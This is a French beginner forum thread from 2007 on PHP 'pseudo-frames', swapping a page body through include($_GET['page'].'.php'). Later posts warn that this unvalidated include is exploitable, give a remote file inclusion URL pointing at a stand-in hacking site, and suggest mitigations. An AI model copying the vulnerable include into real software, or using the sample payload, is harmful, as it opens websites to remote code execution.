lock Posté 17 Novembre 2007 Posté 17 Novembre 2007 Bonjour je voudrais obtenir de l'aide, je m'explique : voilà j'ai un site, et je voudrais creer plusieurs pages. par exemple, en cliquant sur un lien du menu comme "Qui sommes-nous ?" ça affichera une autre page en changeant le corp du site, et en gardant le header, le menu etc... juste en changeant le texte, mais je ne sais pas comment faire! je veux juste créer une page "quisommesnous.php" avec une seule ligne en php si possible, et changer le corp du site ( changer le texte ) j'éspere que je suis assez clair, merci
iNCiTE Web Posté 18 Novembre 2007 Posté 18 Novembre 2007 Il s'agit de la technique des "pseudo-frames" (ça remplace sans aucune comparaison les frames HTML) Article complet sur PHP Débutant
lock Posté 18 Novembre 2007 Auteur Posté 18 Novembre 2007 Bonjour et merci pour votre réponse c'est exactement sa que je veux faire par contre j'ai du mal à l'integrer sur mon site, mon site est un kit graphique simple, et y a environ 5 pages une fois avoir crée les pages news.php et acceuil.php et aussi menu.php, j'ouvre ma page index.html de mon kit et je ne sais pas où mettre cela : <div class="entete" ><?php include('entete.htm'); // Nous appelons l'entete du site?></div><div class="colonneGauche" ><?php include('menu.htm'); // Nous appelons notre menu?></div><div class="colonneDroite"><?php include($_GET['page'].'.php'); // Nous appelons le contenu central de la page?></div><div class="pied"><?php include('pied.htm'); // Nous appelons le pied de page?></div>
joora Posté 21 Novembre 2007 Posté 21 Novembre 2007 Super intéressant! Si je pouvais remplacer toutes mes frames de mon site comme ça ça simplifierais tout! Mais je crois que pour ce coup ci je n'aurai pas le temps (de refaire tout le site), mais je penserai à appliquer ça pour mon prochain site!
pluriels Posté 21 Novembre 2007 Posté 21 Novembre 2007 (modifié) en passant, il faudrait sécuriser un peu include($_GET['page'].'.php'); Avez-vous entendu parler de Cross Site Scripting ? Modifié 21 Novembre 2007 par pluriels
joora Posté 21 Novembre 2007 Posté 21 Novembre 2007 aïe avec ça même un débutant peut prendre le contrôle de ton site!
iNCiTE Web Posté 21 Novembre 2007 Posté 21 Novembre 2007 Ca doit pas lui dire grand-chose, et vu les explications... En gros ils essaient de te dire qu'en utilisant le script basiquement, un malentionné pourrait te hacker, en utilisant un grand classique par exemple index.php?page=http://www.monsitedehack.com/piratage.php car il n'y a pas de tests dans le script d'inclusion... Pour résumer, les fichiers à appeller doivent être dans un dossier, protégé par un .htaccess Et que avant l'inclusion, on teste si le fichier existe bien dans ce dossier, qu'il n'y a pas d'URL dans la variable etc etc Ils en parlent pas dans l'article de PHP Déb ?
Sujets conseillés
Veuillez vous connecter pour commenter
Vous pourrez laisser un commentaire après vous êtes connecté.
Connectez-vous maintenant